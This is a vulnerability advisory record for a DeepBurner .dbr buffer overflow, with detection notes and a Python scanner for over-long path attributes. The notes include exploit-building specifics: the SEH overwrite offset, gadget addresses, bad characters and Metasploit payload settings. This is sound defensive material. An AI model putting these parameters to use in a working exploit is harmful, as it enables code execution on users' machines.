CVE-2006-6665
published 2006-12-20


Priority P432 · medium · CVSS 2.0: 6.8
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 29.37% (97.9th percentile)
Buffer overflow in Astonsoft DeepBurner Pro and Free 1.8.0 and earlier allows user-assisted remote attackers to execute arbitrary code via a long file name tag in a dbr file.

Affected (1 range)

Vendor | Product | Version range | Fixed in
astonsoft | deepburner | <= 1.8.0 | (not listed)

Detection & IOCs (extracted from sources)

filename: msf.dbr
other: 0x10017928
other: 0x101021f8
filename: .dbr
  • The SEH overwrite occurs at offset 272 bytes into the path field of a .dbr file; a short jump of 0x40 bytes is used to skip over the SEH record to reach shellcode.
  • The SEH overwrite uses a pop/pop/ret gadget from BASS.dll (DeepBurner 1.8.0) at 0x10017928; detection should flag .dbr files whose path attribute exceeds 272 bytes.
  • The Metasploit module uses a p/p/r gadget from basswma.dll v2.2.0.3 at 0x101021f8; monitor for DeepBurner loading basswma.dll and crashing on SEH chain traversal.
  • Exploit .dbr files embed XML-encoded shellcode in the path attribute of a <file> tag; look for .dbr files with path attributes containing &#x hex-encoded sequences of length > 272 characters.
  • The DBR file extension is registered to DeepBurner, making drive-by browser delivery possible; monitor browser processes spawning DeepBurner with a .dbr argument from a temp/download directory.
  • Known bad characters for shellcode in this exploit are 0x00, 0x3c (<), 0x3e (>), 0x0a, 0x0d, 0x22 ("), 0x2F (/); IDS rules should look for long runs of non-XML-special bytes in the path attribute.
  • The Metasploit module targets versions 1.9.0.228 and 1.8.0; the payload space is limited to 512 bytes with a stack adjustment of -3500 and NOP generation disabled.
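
The length check from the detection notes above, as an added example that is not part of the original record or of any tool it cites. The double-quoted `<file ... path="...">` layout, the sample documents, and counting each numeric character reference as one unit are assumptions.

```python
import re

# Threshold from the notes above: the overwrite begins 272 bytes into the path field.
MAX_PATH_LEN = 272

# Assumption: entries look like <file ... path="..."> with double-quoted attributes.
# A regex is used instead of an XML parser so malformed files are still inspected.
FILE_TAG = re.compile(rb'<file\b[^>]*?\bpath\s*=\s*"([^"]*)"', re.IGNORECASE)
CHAR_REF = re.compile(rb'&#x[0-9a-fA-F]{1,6};|&#[0-9]{1,7};')

# Constructed samples; the surrounding markup is an assumption, not the real .dbr schema.
BENIGN = b'<project><file name="a.txt" path="C:\\data\\a.txt"/></project>'
LONG_RAW = b'<file name="x" path="' + b"A" * 300 + b'"/>'
LONG_ENCODED = b'<file name="y" path="' + b"&#x41;" * 300 + b'"/>'
AT_LIMIT = b'<file name="z" path="' + b"A" * MAX_PATH_LEN + b'"/>'


def decoded_length(raw: bytes) -> int:
    """Attribute length with every numeric character reference counted as one unit."""
    return len(CHAR_REF.sub(b"?", raw))


def scan_dbr(data: bytes) -> list[dict]:
    """Return one finding per <file> path attribute longer than MAX_PATH_LEN."""
    findings = []
    for match in FILE_TAG.finditer(data):
        raw = match.group(1)
        length = decoded_length(raw)
        if length > MAX_PATH_LEN:
            findings.append({
                "offset": match.start(1),        # byte offset of the attribute value
                "decoded_length": length,        # length after collapsing &#...; references
                "char_refs": len(CHAR_REF.findall(raw)),  # encoded-byte count, per the notes
            })
    return findings


if __name__ == "__main__":
    for label, sample in [("benign", BENIGN), ("long-raw", LONG_RAW),
                          ("long-encoded", LONG_ENCODED), ("at-limit", AT_LIMIT)]:
        print(label, scan_dbr(sample))
```

Measuring the collapsed length rather than the raw byte count keeps the threshold meaningful when the attribute is written entirely as `&#x..;` references, which is the encoding the notes describe.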